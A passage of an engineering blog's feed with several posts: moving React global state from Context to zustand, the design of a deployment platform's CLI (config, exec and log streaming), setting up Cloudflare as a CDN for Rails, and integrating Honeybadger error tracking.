Neetoproduct.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Upgrading React state management with zustand]]></title>
       <author><name>Mohit Harshan</name></author>
      <link href="https://www.bigbinary.com/blog/upgrading-react-state-management-with-zustand"/>
      <updated>2024-01-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/upgrading-react-state-management-with-zustand</id>
      <content type="html"><![CDATA[<h2>From React context to zustand: A seamless transition</h2><p>Global state refers to data that needs to be accessible and shared acrossdifferent parts of an application. Unlike local or component-specific state,global state is not confined to a particular component but is availablethroughout the entire application.</p><p>Let's dive into a real-world scenario to understand the need for a global statein a React application.</p><p>Imagine we're building a sophisticated e-commerce platform with variouscomponents, such as a product catalog, a shopping cart, and a user profile. Eachof these components requires access to shared data, like the user'sauthentication status and the contents of their shopping cart.</p><p>In the application, the user logs in on the homepage and starts adding productsto their shopping cart. As the user navigates through different sections, suchas the product catalog or the user profile, we need to decide how to seamlesslyshare and manage the user's authentication status and the contents of theshopping cart across these disparate components. This is where the concept of aglobal state comes into the picture.</p><p>In the early stages of our application development, we might adopt React Contextto manage this global state.</p><p>In this blog post, we'll discuss the process of upgrading from traditional ReactContext to Zustand, a state management library that offers simplicity,efficiency, and improved performance.</p><h2>The Pitfalls of React Context</h2><p>In our initial setup, we relied on React contexts for managing global states.However, as our application grew, we encountered performance issues andcumbersome boilerplate code. Let's consider a typical scenario where we need aglobal user state:</p><pre><code class="language-jsx">const user = {  name: &quot;Oliver&quot;,  age: 20,  address: {    city: &quot;Miami&quot;,    state: &quot;Florida&quot;,    country: &quot;USA&quot;,  },};</code></pre><p>To use this global state, we had to create a Context, wrap the child componentswithin a provider, and use the <code>useContext</code> hook in the child components. Thisled to unnecessary re-renders and increased boilerplate.</p><pre><code class="language-jsx">// Create a Contextconst UserContext = React.createContext();// Wrap the parent component with the UserContext providerconst App = () =&gt; (  &lt;UserContext.Provider value={user}&gt;    {/* Other components that use the user Context */}  &lt;/UserContext.Provider&gt;);</code></pre><pre><code class="language-jsx">// In a child component, access the user Context using `useContext` hookconst UserProfile = () =&gt; {  const user = React.useContext(UserContext);  return (    &lt;div&gt;      &lt;p&gt;{user.name}&lt;/p&gt;      &lt;p&gt;{user.age}&lt;/p&gt;    &lt;/div&gt;  );};</code></pre><p>Components that listen to the Context will trigger a re-render whenever anyvalue within the Context changes, even if those changes are unrelated to thespecific component.</p><p>For example, in the <code>UserProfile</code> component, if the value of <code>city</code> changes inthe Context, the component will re-render, even if the address values aren'tactually utilized within <code>UserProfile</code>. This can have a noticeable impact onperformance. Furthermore, the usage of Context involves a lot of boilerplatecode.</p><h2>Enter Zustand: A Breath of Fresh Air</h2><p>Zustand emerged as our solution to these challenges. It offered a morestreamlined approach to global state management, addressing the performanceconcerns.</p><p>The <code>useUserStore</code> hook is created using zustand's create function. Itinitializes a store with initial state values and actions to update the state.</p><pre><code class="language-jsx">import create from &quot;zustand&quot;;// Create a user store using zustandconst useUserStore = create(set =&gt; ({  user: {    name: &quot;Oliver&quot;,    age: 20,    address: {      city: &quot;Miami&quot;,      state: &quot;Florida&quot;,      country: &quot;USA&quot;,    },  }  setUser: set,}));</code></pre><p>The <code>UserProfile</code> component uses the <code>useUserStore</code> hook to access the userstate. The <code>store =&gt; store.user</code> function is passed as an argument to the hook,which retrieves the user object from the store.</p><pre><code class="language-jsx">// Access the user via the useUserStore hookconst UserProfile = () =&gt; {  const user = useUserStore(store =&gt; store.user);  return (    &lt;div&gt;      &lt;p&gt;{user.name}&lt;/p&gt;      &lt;p&gt;{user.age}&lt;/p&gt;    &lt;/div&gt;  );};</code></pre><p>In this component, <code>useUserStore</code> is used to access the entire user object fromthe store. Any change in the user object, even if it's a nested property like<code>age</code>, will trigger a re-render of the <code>UserProfile</code> component. This behavior issimilar to how React Contexts work.</p><p>The first argument to the <code>useUserStore</code> hook is a selector function. Using theselector function, we can specify what to pick from the store. Zustand comparesthe previous and current values of the selected data and if the current andprevious values are different, zustand triggers a re-render.</p><p>In the above example, <code>store =&gt; store.user</code> is the selector function. Zustandwill compare the previous value of <code>user</code> with the current value and willtrigger a re-render if the values are different. But inside this component, weneed the values of only <code>name</code> and <code>age</code> properties of the <code>user</code> object.</p><p>This is where Zustand's ability to selectively pick specific parts of the statefor a component that comes into play, offering potential performanceoptimizations.</p><p>If we want to construct a single object with multiple state-picks inside, we canuse <code>shallow</code> function to prevent unnecessary rerenders.</p><p>For example, we can be more specific by picking only <code>name</code> and <code>age</code> valuesfrom user store:</p><pre><code class="language-jsx">import { shallow } from &quot;zustand/shallow&quot;;const { name, age } = useUserStore(  ({ user }) =&gt; ({ name: user.name, age: user.age }),  shallow);</code></pre><p>Without <code>shallow</code>, the function<code>({ user }) =&gt; ({ name: user.name, age: user.age })</code> recreates the object<code>{ name: user.name, age: user.age }</code> everytime it is called.</p><p><code>shallow</code> is a function of comparison that checks for equality at the top levelof the object, without performing a deep comparison of nested properties.Zustand's default behavior is to use <code>Object.is</code> for comparisons of the currentand previous values. Even though the current and previous objects can have thesame properties with equal values, they are not considered equal when comparedusing the strict equality operator ( <code>Object.is</code> ), same in the case of arrays.By adding <code>shallow</code> it will dig into the array/object and compare its key valuesor elements in the array and if any one is different, it triggers again.</p><p>In the above case, <code>shallow</code> ensures that the <code>UserProfile</code> component willre-render only if the <code>name</code> or <code>age</code> properties of the user object change.</p><p>Zustand also provides the <code>getState</code> function as a way to directly access thestate of a store. This function can be particularly useful when we want toaccess the state outside of the component rendering cycle.</p><p>When using a value within a specific function, the <code>getState()</code> retrieves thelatest value at the time of calling. It is useful to avoid having the valueloaded using the hook (which will trigger a re-render when this value changes).</p><pre><code class="language-jsx">const useUserStore = create(() =&gt; ({ name: &quot;Oliver&quot;, age: 20 }));// Getting non-reactive fresh stateconst handleUpdate = () =&gt; {  if (useUserStore.getState().age === 20) {    // Our code here  }};</code></pre><h2>Working with Zustand</h2><h3>1. Installing zustand</h3><pre><code class="language-bash">yarn add zustand</code></pre><h3>2. Replacing all contexts with zustand</h3><p>During the initial migration, we replaced all React contexts with Zustand. Thisinvolved copying data and replacing Context hooks with Zustand stores. Our focuswas on the migration itself, deferring performance enhancements for a laterphase.</p><p>In the context of Zustand, &quot;actions&quot; refer to functions that are responsible forupdating the state. In other words, actions are methods that modify the datawithin the state container.</p><pre><code class="language-jsx">const useUserStore = create(  withImmutableActions(set =&gt; ({    name: 10,    age: 20,    address: {      city: &quot;Miami&quot;,      state: &quot;Florida&quot;,      country: &quot;USA&quot;,    },    setName: ({ name }) =&gt; set({ name }),    setGlobalState: set,  })));</code></pre><p>In the provided code snippet, <code>setName</code> and <code>setGlobalState</code> are examples ofactions. Let's break it down:</p><p><code>setName</code>: This action takes an object as an argument, specifically <code>{ name }</code>,and updates the name property of the state with the provided value.</p><pre><code class="language-jsx">setName: ({ name }) =&gt; set({ name }),</code></pre><p><code>setGlobalState</code>: Similarly, this action takes an argument, and in this case, itmerges the state with the provided argument. It's a more generic action thatallows modifying multiple properties of the state at once.</p><p>To safeguard against actions being overwritten, we introduced a middlewarefunction called <code>withImmutableActions</code></p><p>This middleware ensures that attempts to overwrite Zustand store actions resultin an error, providing a safeguard against unintended behavior.</p><p>The <code>withImmutableActions</code> throws an error because we are trying to overwritethe zustand store's actions.</p><pre><code class="language-jsx">// throws an errorsetGlobalState({ name: 0, setName: () =&gt; {} });</code></pre><p>Here is the source code of <code>withImmutableActions</code>:</p><pre><code class="language-js">import { isEmpty, keys } from &quot;ramda&quot;;const setWithoutModifyingActions = set =&gt; partial =&gt;  set(previous =&gt; {    if (typeof partial === &quot;function&quot;) partial = partial(previous);    const overwrittenActions = keys(partial).filter(      key =&gt;        typeof previous?.[key] === &quot;function&quot; &amp;&amp; partial[key] !== previous[key]    );    if (!isEmpty(overwrittenActions)) {      throw new Error(        `Actions should not be modified. Touched action(s): ${overwrittenActions.join(          &quot;, &quot;        )}`      );    }    return partial;  }, false);const withImmutableActions = config =&gt; (set, get, api) =&gt;  config(setWithoutModifyingActions(set), get, api);</code></pre><p>Unlike zustand's default behavior, this middleware disregards the<a href="https://github.com/pmndrs/zustand#overwriting-state">second argument of the <code>set</code> function</a>which is used to overwrite the entire state when set to <code>true</code>. Hence, thefollowing lines of code work identically to each other:</p><pre><code class="language-jsx">setGlobalState({ value: 0 }, true);setGlobalState({ value: 0 });</code></pre><h3>3. Performance optimization strategies</h3><p>We identified key strategies to optimize performance while using Zustand:</p><h4>Selective Data Usage</h4><p>Instead of using the entire state, components can selectively choose the datathey need. This ensures that re-renders occur only when relevant data changes.</p><p>Consider the following user store:</p><pre><code class="language-jsx">const useUserStore = create(set =&gt; ({  name: &quot;&quot;,  subjects: [],  address: {    city: &quot;&quot;,    country: &quot;&quot;,  },  setUser: set,}));</code></pre><p>If we only need the city value, we can do:</p><pre><code class="language-jsx">const city = useUserStore(store =&gt; store.address.city);</code></pre><p>In this case, the usage of <code>shallow</code> is not necessary because the selected datais a primitive value (<code>city</code>), not a complex object with nested properties.<code>shallow</code> is not needed when the returned object can be compared using<code>Object.is</code> operator.</p><h4>Avoiding importing values like contexts</h4><pre><code class="language-jsx">// Not recommendedconst {  address: { city, country },  setAddress,} = useUserStore();</code></pre><p>We can replace the above code with the following approach:</p><pre><code class="language-jsx">const { city, country } = useUserStore(  store =&gt; pick([&quot;city&quot;, &quot;country&quot;], store.address),  shallow);const setAddress = useUserStore(prop(&quot;setAddress&quot;));// `pick` and `prop` are imported from ramda</code></pre><h4>Avoiding prop drilling</h4><p>Directly accessing Zustand values within the intended component eliminates theneed for prop drilling, improving code clarity and maintainability.</p><h4>Utilizing <code>getState</code> Method</h4><p>When used within a function, the <code>getState()</code> retrieves the latest value at thetime of calling the function. It is useful to avoid having the value loadedusing the hook (which will trigger a re-render when this value changes)</p><pre><code class="language-jsx">const handleUpdate = () =&gt; {  if (useUserStore.getState().role === &quot;admin&quot;) {    // Our code here  }};</code></pre><h2>Challenges and Solutions</h2><h3>Shared State Instances Across Components</h3><p>Zustand's design maintains a single instance of state and actions. When usingthe same store hook across multiple components, values are shared. To addressthis, we combined Zustand with React Context, achieving a balance betweenefficient state management and isolation.</p><p>When we call the store hook (<code>useUserStore</code>) from different components whichneed separate states, the values returned by the hook will be the same acrossthose components.</p><p>This behavior is a consequence of zustand's design. It maintains a singleinstance of the state and actions, ensuring that all components using the samehook share the same state and actions.</p><p>To illustrate this, consider an example where we have two input components on aform page: one for the Student profile and another for the Teacher profile. Bothcomponents are utilizing the same <code>useUserStore</code> to manage both student andteacher details.</p><pre><code class="language-jsx">// useUserStore.jsimport { create } from &quot;zustand&quot;;const useUserStore = create(set =&gt; ({  name: &quot;&quot;,  subjects: [],  address: {    city: &quot;&quot;,    country: &quot;&quot;,  },  setUser: set}));export default useUserStore;// App.jsximport React from &quot;react&quot;;import Profile from &quot;./Profile&quot;;const App = () =&gt; (  &lt;div&gt;    &lt;Profile role=&quot;Teacher&quot; /&gt;    &lt;Profile role=&quot;Student&quot; /&gt;  &lt;/div&gt;);export default App;// Profile.jsximport React from &quot;react&quot;;import { prop } from &quot;ramda&quot;import useUserStore from &quot;./stores/useUserStore&quot;;const Profile = ({ role }) =&gt; {  const name = useUserStore(prop(&quot;name&quot;));  const setName = useUserStore(prop(&quot;setName&quot;));  return (    &lt;div&gt;      &lt;p&gt;{`Enter the ${role}'s name`}&lt;/p&gt;      &lt;input        value={name}        onChange={(e) =&gt; setName(e.target.value)}      /&gt;    &lt;/div&gt;  );};export default Profile;</code></pre><p>In this setup, since both the Student and Teacher profiles are using the samestore (<code>useUserStore</code>), the input fields in both components will display thesame value.</p><p><img src="/blog_images/2024/upgrading-react-state-management-with-zustand/multiple_components_using_same_store.gif" alt="Multiple components using same store"></p><p>We combined Zustand with React Context to address this challenge of shared stateinstances across different components on the same page. By doing so, we haveachieved a balance between the benefits of Zustand's efficient state managementand the isolation provided by React Context.</p><pre><code class="language-jsx">// Create a Contextimport { createContext } from &quot;react&quot;;const UserContext = createContext(null);export default UserContext;// Modify useUserStore using createStoreimport { createStore } from &quot;zustand&quot;;const useUserStore = () =&gt;  createStore((set) =&gt; ({    name: &quot;&quot;,    subjects: [],    address: {      city: &quot;&quot;,      country: &quot;&quot;    },   setUser: set  }));export default useUserStore;// Add changes to Profile.jsximport React, { useContext, useMemo } from &quot;react&quot;;import { pick } from &quot;ramda&quot;;import useUserStore from &quot;./stores/useUserStore&quot;;import { useStore } from &quot;zustand&quot;;import { shallow } from &quot;zustand/shallow&quot;;import UserContext from &quot;./contexts/User&quot;;const Profile = ({ role }) =&gt; {  const userStore = useContext(UserContext);  const { name, setName } = useStore(    userStore,    pick([&quot;name&quot;, &quot;setName&quot;]),    shallow  );  return (    &lt;div&gt;      &lt;p&gt;{`Enter the ${role}'s name`}&lt;/p&gt;      &lt;input value={name} onChange={(e) =&gt; setName(e.target.value)} /&gt;    &lt;/div&gt;  );};const ProfileWithState = (props) =&gt; {  const stateStore = useMemo(useUserStore, []);  return (    &lt;UserContext.Provider value={stateStore}&gt;      &lt;Profile {...props} /&gt;    &lt;/UserContext.Provider&gt;  );};export default ProfileWithState;</code></pre><p>With this implementation, each component gets its own isolated state, avoidingthe issue of shared state instances.</p><p><img src="/blog_images/2024/upgrading-react-state-management-with-zustand/multiple_components_using_same_store_with_context.gif" alt="Multiple components using same store with context"></p><h3>Tackling Boilerplate Code</h3><p>In the codebase, there was a recurring pattern of boilerplate code when tryingto pick specific properties from a Zustand store with nested values. Thisinvolved using <code>shallow</code> and manually accessing nested properties, resulting inverbose code.</p><p>To simplify this process and reduce boilerplate, a<a href="https://github.com/bigbinary/babel-preset-neeto/blob/main/docs/zustand-pick.md">custom babel plugin</a>was developed. This plugin provides a cleaner syntax for property picking fromZustand stores.</p><p>Without the plugin, to pick specific values from the store, we needed to write:</p><pre><code class="language-jsx">// Beforeimport { shallow } from &quot;zustand/shallow&quot;;const { order, customer } = useGlobalStore(  store =&gt; ({    order: store[sessionId]?.globals.order,    customer: store[sessionId]?.globals.customer,  }),  shallow);</code></pre><p>With the babel plugin, the above code can be written as:</p><pre><code class="language-jsx">//Afterconst { order, customer } = useGlobalStore.pick([sessionId, &quot;globals&quot;]);</code></pre><p>The babel transformer will transform this code to the one shown above to achievethe same result.</p><p>A transformer is a module with a specific goal that is run against our code totransform it. The Babel plugin operates during the code compilation process. Byusing the Babel plugin, developers can achieve the same functionality with fewerlines of code, reducing code verbosity.</p><p>The <code>useGlobalStore.pick</code> syntax provides a more streamlined and expressive wayof picking properties. It abstracts away the need for manual property access andthe use of <code>shallow</code>.</p><h2>Conclusion</h2><p>Upgrading to Zustand has proven to be a wise decision, addressing performanceconcerns and streamlining our state management. By combining Zustand with ReactContext and tackling challenges with innovative solutions, we've achieved arobust and efficient state management system in our React applications.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Building NeetoDeploy CLI]]></title>
       <author><name>Sreeram Venkitesh</name></author>
      <link href="https://www.bigbinary.com/blog/building-neeto-deploy-cli"/>
      <updated>2023-12-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/building-neeto-deploy-cli</id>
      <content type="html"><![CDATA[<p><em>We are building <a href="https://neeto.com/neetoDeploy">NeetoDeploy</a>, a compellingHeroku alternative. Stay updated by following NeetoDeploy on<a href="https://twitter.com/neetodeploy">Twitter</a> and reading our<a href="https://www.bigbinary.com/blog/categories/neetodeploy">blog</a>.</em></p><p>Building the CLI tool for <a href="https://neetodeploy.com">NeetoDeploy</a> became our toppriority after we had built all the basic features in NeetoDeploy. Once westarted migrating our apps from Heroku to NeetoDeploy, the need for a CLI toolarose, since previously developers were using Heroku CLI for their scripts etc.</p><p>We started building the CLI as a Ruby gem using <a href="http://whatisthor.com/">Thor</a>.Installing the gem and using it would be as simple as running<code>gem install neetodeploy</code>. We wanted the users to be authenticated via Neeto'sauthentication system before they could do anything else with the CLI. For this,we added a <code>neetodeploy login</code> command, which would create a session andredirect you to the browser where you can log in. The CLI would be polling thesession login status, and once you have logged in, it would store the sessiontoken and your email address inside the <code>~/.config/neetodeploy</code> directory. Thiswill be used to authenticate your request when you run everything else.</p><h3>The basic CLI functionality</h3><p>The v1 release of the NeetoDeploy CLI shipped the following commands:</p><ul><li><code>config</code> : For listing, creating, and deleting environment variables for yourapps.</li><li><code>exec</code> : For getting access to a shell running inside your deployed app.</li><li><code>logs</code> : For streaming the application logs right to your terminal.</li></ul><p>Let's look at each of them in detail.</p><h3>Setting environment vars</h3><p>Building the <code>config</code> command was the most straightforward of the three. Thecentral source or truth for all the environment variables of the apps is storedin the web dashboard of NeetoDeploy. There are APIs already in place for doingCRUD operations on these from the dashboard app. This could be expanded for theuse of the CLI as well.</p><p>We first added API endpoints in the dashboard app, under a CLI namespace, tolist, create, and delete config variables. We then added different commands inthe CLI to send HTTP requests to the respective endpoints in the dashboard app.</p><p><img src="/blog_images/2023/building-neeto-deploy-cli/cli-demo.gif" alt="The NeetoDeploy config command in action"></p><p>You can pass the app name as an argument, and the CLI will send a request to thedashboard app along with the session token generated when you logged in. At thebackend, this session token would be used to check if you have access to the appyou're requesting, before doing anything else.</p><p>If you have used Heroku CLI, then you would be very comfortable sinceNeetoDeploy CLI follows the same style.</p><h3>Architecting the <code>neetodeploy exec</code> command</h3><p>The <code>exec</code> command is used to get access to a shell inside your deployed app.The NeetoDeploy web dashboard already has a functioning console feature withwhich you can get access to the shell inside your applications dynos. This wasbuilt using websockets. We would deploy a &quot;console&quot; pod with the same image andenvironment variables as the app, to which we'll connect with websockets. Wehave a dyno-console-manager app which spawns a new process inside the consoledyno and handles the websocket connections, etc. When we started building theexec feature for the CLI however, we explored a few options and learnt a lot ofthings before finally settling back on the websockets approach.</p><p>Weve been using the <code>kubectl exec</code> command on a daily basis to get access toshells inside pods running in the cluster. Since <code>kubectl exec</code> is cosmeticallysimilar to how we use SSH to access remote machines, the first approach we tookinvolved using SSH to expose containers outside the cluster.</p><p>We can expose our deployment outside the cluster using SSH in two ways. Thefirst approach would be running an SSH server as a<a href="https://www.google.com/search?q=kubernetes+sidecar+container+pattern">sidecar container</a>within the console pod. The second approach would be to bundle<a href="https://man7.org/linux/man-pages/man8/sshd.8.html">sshd</a> within the image forthe console pod using a custom buildpack. With either of these two methods, youwould be able to SSH into your console deployment if you have the correct SSHkeys. We ran <code>sshd</code> inside a pod using a<a href="https://github.com/jkutner/sshd-buildpack">custom sshd buildpack</a>. We thenconfigured the SSH public key inside the pod manually with <code>kubectl exec</code>. Withthis, we were able to SSH into the pod after port forwarding the sshd processsport to localhost using <code>kubectl port-forward</code>.</p><p>Great! Now that the SSH connection works, the part of the puzzle that remainednow was how we would actually expose the deployment outside the cluster inproduction. We tried doing this in a couple of different ways.</p><h4>1. LoadBalancer</h4><p>We were able to SSH into the pod after exposing it as a<a href="https://kubernetes.io/docs/tasks/access-application-cluster/create-external-load-balancer">LoadBalancer</a>service. This was out of the question for production however, since AWS has ahard limit on the number of application load balancers (ALB) we can create perregion. Wed also have to pay for each load balancer we create. This approachwouldnt scale at all.</p><h4>2. NodePort</h4><p>The next option was to expose the pod as a <code>NodePort</code> service. A NodePortservice in Kubernetes means that the pod would be exposed through a certain portnumber through <em>every node</em> in the cluster. We could SSH into the pod with theexternal IP of any of the nodes. We tried exposing the test console pod wecreated with a NodePort service as well. We were able to SSH into the pod fromoutside the cluster without having to do the port forward. There was onelimitation for using NodePorts that we knew would render this method suboptimalfor building a Platform as a Service. The range of ports that can be allocatedfor NodePort services is from 30000 to 32768 by default. This means that wedonly be able to run 2768 instances of <code>neetodeploy exec</code> at any given time inour current cluster setup in EKS.</p><h4>3. Bastion host, the SSH proxy server</h4><p>We thought of deploying an SSH proxy server to circumvent the hard limits on theLoadBalancer and NodePort approaches. Such proxy servers are usually calledbastion hosts or jump servers. These are servers that are designed to provideaccess to a private network from a public network. The name &quot;bastion&quot; comes fromthe military structure that projects outwards from a castle or a fort. In asimilar sense, our bastion host will be a Kubernetes deployment that is exposedto the public network and acts as an interface between our private cluster andthe public internet. For our requirement, we can proxy SSH connections toconsole pods through this bastion host deployment. We only needed to expose thebastion host as a single LoadBalancer or a NodePort service, to which the CLIcan connect. This would solve the issue of having a hard limit on the number ofLoadBalancer or NodePort services we can create.</p><p><img src="/blog_images/2023/building-neeto-deploy-cli/bastion-host.png" alt="The bastion host architecture for exposing deployments"></p><p>We quickly set up a bastion host and tested the whole idea. It was workingseamlessly! However, there were a lot of edge cases we'd have to handle if weare going to release this to the public. Ideally, we would want a new pair ofSSH keys for each console pod. We could generate this and store it as secrets inthe cluster. Apart from the hassle of handling all the SSH keys and updating thebastion host each time, we would have to make sure that users will not be ableto get SSH access to the bastion host deployment manually, outside the CLI. Thiswas difficult since the CLI would need access to the private key in order toconnect to the bastion host anyway. This would mean that users could SSH intothe bastion host after digging through the CLI gem's source, and possibly evenexec into any deployment in the cluster if they knew what they were looking for.Users with malicious intent could possibly bring down the bastion host itselfonce they're inside, rendering the exec command unusable.</p><p>We thought about installing kubectl inside the bastion host with a restrictive<a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">RBAC</a> so that wecan run <code>kubectl exec</code> from inside the bastion host, also while making sure thatusers could not run anything destructive from inside the bastion host. But thisjust adds more moving parts to the system. The SSH proxy approach makes sense ifyou have to expose your cluster among developers for internal use, but it is notideal when you are building a CLI for public use.</p><p>After figuring out <em>how not to solve the problem</em>, we came to the conclusionthat using websockets was the better approach for now. We already have thedyno-console-manager app, which we are using for the shell access from the webdashboard, we updated the same to handle connections from the CLI. From theCLI's end, we wrote a simple WebSocket client and handled the parsing of userinputs and printing the responses from the shell. All of the commands you enterwould be run on the console pod through the websocket connection.</p><h3>Streaming logs to the terminal</h3><p>Live logs were streamed to the web dashboard using websockets too. This was alsohandled by the above-mentioned dyno-console-manager. Since we had written a Rubywebsocket client for the <code>exec</code> command, we decided to use the same approachwith logs too.</p><p>The CLI would send a request to the dyno-console-manager with the apps name andthe dyno-console-manager would run <code>kubectl logs</code> for your app's deployment andstream it back to the CLI via a websocket connection it creates.</p><p>We took our time with architecting the NeetoDeploy CLI, but thanks to that welearnt a lot about designing robust systems that would scale in the long term.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without anychange. If you want to give NeetoDeploy a try, then please send us an email at<a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, followNeetoDeploy on <a href="https://twitter.com/neetodeploy">X</a>. You can also join our<a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about anyNeeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Cloudflare as CDN for Rails applications]]></title>
       <author><name>Abhijith Sheheer</name></author>
      <link href="https://www.bigbinary.com/blog/using-cloudflare-as-cdn-for-rails-applications"/>
      <updated>2023-12-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/using-cloudflare-as-cdn-for-rails-applications</id>
      <content type="html"><![CDATA[<p>We use <a href="https://www.cloudflare.com/">Cloudflare</a> as our DNS server. But,Cloudflare is much more than a DNS server. It can be used as a content deliverynetwork (CDN).</p><p>A CDN is a geographically distributed group of servers that cache content closeto end users. Let's say that a user from London is hitting a website that has aJavaScript file hosted in Chicago. That JavaScript file has to travel all theway from Chicago to London. This means the site will load slowly.</p><p>A CDN will have a copy of that JavaScript file in London itself. In this way,for that user, that JavaScript file will be loaded from the London server andnot from the Chicago server. This is what a CDN primarily does.</p><p>Here's how we set up Cloudflare as a CDN for our Rails applications.</p><h2>1. Configure CNAME record for CDN subdomain in Cloudflare</h2><p>We need a subdomain that will act as a CDN. For<a href="https://www.neeto.com/neetocal">NeetoCal</a>, we use https://cdn.neetocal.com asthe subdomain. You can use any subdomain you want.</p><p>To set up this subdomain, follow these steps.</p><ol><li>Add a new record with the <strong>type</strong> <code>CNAME</code>.</li><li>In the <strong>name</strong> field, enter <code>*</code>.</li><li>In the <strong>target</strong> field, enter the URL where the Rails app is deployed.</li></ol><p>If we already have a <code>CNAME</code> record for <code>*</code> that handles all the subdomains,then we don't need to create a new one.</p><p><img src="/blog_images/2023/using-cloudflare-as-cdn-for-rails-applications/create-cname-record.png" alt="Creating  record"></p><h2>2. Turn on the Proxy feature in Cloudflare</h2><p>In the previous step, when creating a new <code>CNAME</code> record, by default, Cloudflarewill enable proxy for each record.</p><p>Once the <strong>Proxy status</strong> column is turned on, it will display 'Proxied' asshown below.</p><p><img src="/blog_images/2023/using-cloudflare-as-cdn-for-rails-applications/proxy-status-on.png" alt="&quot;Proxy status&quot; turned ON"></p><p>When we turn on &quot;Proxy&quot;, then the DNS queries will resolve to the Cloudflare IPaddress instead of the target. It means Cloudflare will get all the requests andthen Cloudflare in turn will forward those requests to the target.</p><p>Let's say that a user from Paris loads a webpage which is hosted in Chicago andCloudflare has a server in Paris. When &quot;Proxy&quot; is turned on, then when the usermakes the first request to the server, that request will go to Cloudflare.Cloudflare doesn't have the JavaScript file, so Cloudflare will forward thatrequest to the server. The server will send that JavaScript file to Cloudflare.Cloudflare will cache this JavaScript file and serve the JavaScript file to theuser.</p><p>Two seconds later, another user from a different part of Paris hits the samewebpage. This time, Cloudflare has a cached copy of the JavaScript file andCloudflare will serve the JavaScript from its server in Paris.</p><p>This has two benefits. The first benefit is that the user gets to see thewebpage really fast. The second benefit is that the server cost is a lot lowersince fewer requests need to be served by the server in Chicago.</p><h3>What all things Cloudflare can cache</h3><p>Cloudflare can only cache files that are stored on the domain that is proxiedthrough Cloudflare. If we have an image file that is stored on Amazon S3 and isaccessed via a direct S3 URL, then Cloudflare <strong>won't</strong> be able to cache it.</p><p>Cloudflare caches are based on file extensions, not MIME types.<a href="https://developers.cloudflare.com/cache/about/default-cache-behavior/#default-cached-file-extensions">Here</a>is the list of file extensions that will be cached by default. HTML is not onthis list.</p><p>Cloudflare allows us to cache other file types by setting up suitable<a href="https://developers.cloudflare.com/cache/how-to/create-page-rules/">page rules</a>.</p><h2>3. Set appropriate Cache-Control headers in Rails</h2><p>When utilizing Cloudflare as a CDN, it's crucial to configure our Rails app toserve assets with specific <code>Cache-Control</code> headers. This ensures optimal cachingbehavior for resources.</p><p>The Rails app should serve assets with a header similar to the one given below.</p><pre><code>cache-control: public, max-age=31536000</code></pre><p>The <code>cache-control</code> must be public, and <code>max-age</code> must be a positive value forCloudflare to<a href="https://developers.cloudflare.com/cache/concepts/default-cache-behavior/#default-cached-behavior">cache the resource</a>.</p><p>For this, we need to modify the Rails configuration file<code>config/environments/production.rb</code>.</p><pre><code class="language-ruby">config.public_file_server.headers = {  'Cache-Control' =&gt; 'public, max-age=31536000'}</code></pre><p>Here, <code>Cache-Control</code> is set to 'public', allowing any cache (includingCloudflare) to store the resource. The <code>max-age</code> is specified as 31,536,000seconds (one year), indicating how long the cache should retain the objectbefore considering it stale.</p><h2>4. Configure <code>asset_host</code> in Rails.</h2><p>We added the secrets for the <code>asset_host</code> in our Rails application's<code>config/secrets.yml</code> file.</p><pre><code class="language-yml">production:  asset_host: &lt;%= ENV[&quot;ASSET_HOST&quot;] %&gt;</code></pre><p>We also added an environment variable called <code>ASSET_HOST</code> that contains our newCDN host URL.</p><pre><code>ASSET_HOST=cdn.neetoX.com</code></pre><p>Once this is done all asset URLs will point to <code>https://cdn.neetoX.com</code>.</p><h2>5. Verify changes</h2><p>Once all the setup is done, it can take a few hours for the changes to bereflected. Hit the page and see the response header of <code>.js</code> file.</p><p>If the response header <code>cf-cache-status</code> had a value of <code>HIT</code>, then that meansCloudflare is serving that asset from its cache.</p><p><img src="/blog_images/2023/using-cloudflare-as-cdn-for-rails-applications/browser-console-cache-status.png" alt="Viewing cache status in browser console"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Honeybadger frontend integration in Neeto apps]]></title>
       <author><name>Calvin Chiramal</name></author>
      <link href="https://www.bigbinary.com/blog/honeybadger-frontend-integration-in-neeto-apps"/>
      <updated>2023-12-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/honeybadger-frontend-integration-in-neeto-apps</id>
      <content type="html"><![CDATA[<p>At Neeto, we integrated Honeybadger to track all errors in our applications atruntime. We also integrated Honeybadger with GitHub to automatically raiseissues in the respective repositories when errors are caught. This blog is anin-depth guide on how we integrated Honeybadger on the frontend part of our webapps.</p><p>For our apps deployed on Heroku, we used the following command to get the latestcommit hash as an environment variable in the Heroku server on each build:</p><pre><code class="language-bash">heroku labs:enable runtime-dyno-metadata -a your-app-name</code></pre><p>With NeetoDeploy, we <a href="https://youtu.be/r4g-a6k5SYY?t=176">didn't need this step</a>since git is available in the console and we used git commands to set the latestcommit hash as the Honeybadger revision. Honeybadger uses the<a href="https://docs.honeybadger.io/lib/javascript/guides/using-source-maps/#versioning-your-project">revision</a>to associate maps with the bundle when the bundle name doesn't change.</p><p>Steps to integrate Honeybadger:</p><ol><li><p>Create a new project in the Honeybadger dashboard. We've made a<a href="https://youtu.be/h5svJ15Vg5Q">video</a> on setting it up following the<a href="https://docs.honeybadger.io/lib/javascript/integration/react/">React integration guide</a>.</p></li><li><p>Set the environment variable <code>HONEYBADGER_JS_API_KEY</code> with the Honeybadgerproject's API key. The API key can be copied from <code>Settings =&gt; API Keys</code>.</p></li></ol><p>In depth guides for Honeybadger integration &amp; sourcemap upload:</p><ul><li><a href="https://youtu.be/h5svJ15Vg5Q">What is honeybadger</a></li><li><a href="https://youtu.be/vtIk6g-NekA">Honeybadger integration basics</a></li><li><a href="https://youtu.be/yRrKBnN00Yc">Honeybadger integration in the Neeto ecosystem</a></li><li><a href="https://youtu.be/qZD9pus_9ro">Sourcemaps explained</a></li><li><a href="https://youtu.be/r4g-a6k5SYY">Uploading sourcemap to honeybadger</a></li><li><a 